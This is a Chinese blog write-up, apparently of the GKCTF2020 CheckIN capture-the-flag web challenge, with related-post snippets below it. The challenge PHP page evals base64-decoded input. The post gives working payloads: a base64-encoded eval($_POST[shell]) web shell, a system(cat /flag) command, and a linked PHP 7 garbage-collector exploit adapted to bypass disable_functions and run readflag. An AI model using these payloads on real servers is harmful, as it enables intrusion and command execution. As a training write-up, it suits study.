[GKCTF2020]CheckIN

最新推荐文章于 2023-08-21 20:47:58 发布
最新推荐文章于 2023-08-21 20:47:58 发布
阅读量289 收藏
点赞数
分类专栏: buu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missht0/article/details/113183759
版权

[GKCTF2020]CheckIN

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();

base64编码后传参给Ginkgo,然后eval执行

?Ginkgo=phpinfo();
?Ginkgo=cGhwaW5mbygpOw==

在这里插入图片描述

?Ginkgo=eval($_POST[shell]);
?Ginkgo=ZXZhbCgkX1BPU1Rbc2hlbGxdKTs=
post: shell=system(cat /flag);

没有回显啊,看了一下phpinfo,里面过滤了一大堆命令执行的函数,那就只能一句话木马了

?Ginkgo=eval($_POST[shell]);
?Ginkgo=ZXZhbCgkX1BPU1Rbc2hlbGxdKTs=

在这里插入图片描述
在这里插入图片描述
有个flag和readflag,一个打不开一个是乱码
readflag的权限是6755,可以猜测是让我们用它来读flag,但是我们权限不够

看了wp才知道php版本为7.3,这个版本有一个漏洞
php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令
影响范围是linux,php7.0-7.3
给出了exp
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php
下载后进行修改,改为执行readflag
在这里插入图片描述
tmp的权限是1777,所以文件传到tmp目录下,从tmp目录去独取flag
在这里插入图片描述

?Ginkgo=eval($_POST[shell]);
?Ginkgo=ZXZhbCgkX1BPU1Rbc2hlbGxdKTs=
post:shell=include('/tmp/exploits.php');

在这里插入图片描述

切谁怕谁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【学习笔记 22】 buu [GKCTF2020]CheckIN
weixin_43553654的博客
06-25 553
0x00 知识点 任意文件写入漏洞,部分过滤的绕过 0x01 解题过程 打开一看,代码审计 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $th
checkin
03-18
报到 此仓库包含为测试“深层链接”教程而开发的“酒店基本入住”网站应用程序。 部署方式 通过单击以下按钮之一,您可以轻松地免费将自己的Web应用程序版本免费部署到Heroku。 起动机 最终的
GKCTF2020 checkin
qq_53755216的博客
06-23 308
写在前面 最近快期末考了 拼搏20天 我要上大二 每天晚上会找时间刷一下CTF 正片开始 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $thi
[GKCTF2020]CheckIN 详细解题思路及做法
EC_Carrot的博客
12-07 1792
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 打开题目,看到class以为是反序列化,但实际并不是,这里直接用$_REQUEST传入了参数便可以利用了。 看到base64_decode,说明我们的代码需要加密一下,尝试着直接传入c3lzdGVtKCdscycpOw==(即为base64加密后的system('ls');) 发现并不能返回数据,是难道是不能这么利用吗? 接着我尝试了一下cGh
glados_checkin
03-25
glados定时签到
checkin-system
05-19
2.克隆gsshop-checkin $ git clone https://github.com/GSSHOPLabs/gsshop-checkin.git $ cd gsshop-checkin $ npm install 3.启动gsshop-checkin $ node ./bin/www 4.开始开发 http://localhost:3000 5.捕获...
checkin-ncku
05-21
checkin-nckuFeature打卡完截屏并寄到信箱每天随机打卡依据上班时间,在合法时间内进行随机下班打卡依据假期日,跳过打卡日期Install yarn installUsage填入所需的帐户资讯到credential.json cp credential-template...
[GKCTF2020]CheckIN详解
D1stiny的博客
06-01 4295
打开之后是这样的,没有发现反序列化函数,但是发现有一个@eval,想到了一句话,这是用base64进行传参 首先传参phpinfo();看看,需要经过base64编码 http://e0cc90ac-d4bc-450c-a6a4-476298ce7c18.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw== 找到disable_functions,发现过滤了许多危险函数 我们上传一个一句话木马看看 eval($_POST[123]);,经过base64是ZXZhbCgkX1
每日练习-[GKCTF 2020]CheckIN
m0_68113265的博客
08-21 125
本题前面有eval还增加eval原因是eval是把内容当作php代码执行写入$_POST[1]就不是一句话木马了,所以再增加一个eval(disable_function刚好没禁用)$_REQUEST是可以接受$_GET,$_POST,$_Cookie的,disable_function禁用了大多函数,可以使用蚁剑插件进行绕过。php配置文件默认的处理优先级,默认的数据写入顺序是EGPCS。当同时一个参数名,越往后的可以覆盖前面的参数。C代表$_COOKIE。S代表$_SERVER。
BUUCTF:[GKCTF2020]CheckIN
qq_46230755的博客
12-16 495
这题还是很有意思的,考的点有 先看一下题目给的代码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this
Buuctf [GKCTF2020]CheckIN
CyhDl666的博客
03-19 319
进入网站直接贴了源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin.
BUU刷题--[GKCTF2020]CheckIN [网鼎杯 2020 朱雀组]phpweb
weixin_48631429的博客
12-02 376
[GKCTF2020]CheckIN 打开题目: <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this
re学习笔记(64)GKCTF2020-re-Check_1n|BabyDriver
逆向随笔
05-24 1648
Check_1n 第一题运行程序,提示输入开机密码 输入错误会提示密码错误,去IDA搜索字符串得到密码HelloWord 然后开机后运行 打砖块 程序即可得到flag 切换程序的时候用箭头上下左右,回车启动, BabyDriver 搜索字符串发现有一串类似迷宫的字符串 迷宫字符串长度是225,刚开始以为是1515的,分析了下代码发现是1614的,, 可以写程序画出迷宫来,然后就是按键的问题了,,,因为是sys文件,所以按键应该是键盘扫描码而不是ASCII码 在线键盘扫描码查询 下移是0x25也就是K
[GKCTF2020]web
臭nana的博客
05-26 1053
CheckIN 打开题目得到源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$t
[GKCTF2020]cve版签到 100
weixin_45674567的博客
05-25 392
搜索cve2020-7066有关知识 直接传入:?url=http://127.0.0.1%00.ctfhub.com 传入改为:?url=http://127.0.0.123%00.ctfhub.com flag{92053d2a-b9ae-4e48-b29a-1723358e6bf2}
GKCTF2020部分web
0xdawn的博客
05-28 997
[GKCTF2020]CheckIN <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Ginkgo']; $this-&
[GKCTF2020]CheckIN -wp
freerats的博客
06-06 1198
向Ginkgo传参,后面还有eval函数,先传个phpinfo(); 试试,要传base64编码后的。 发现没有问题,发现一大堆被禁的函数,php版本为7.3。 接下来看看能不能穿一句话上去 eval($_POST[‘ccc’]); ?Ginkgo=ZXZhbCgkX1BPU1RbJ2NjYyddKTs= 然后用蚁剑连接 可以看到flag和readflag; 权限不够无法打开flag,readflag打开也是一堆乱码。 这种情况一般就是通过执行readflag来获取flag。 接下来就要结合7.3版本,r
2021gkctf checkin
最新发布
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值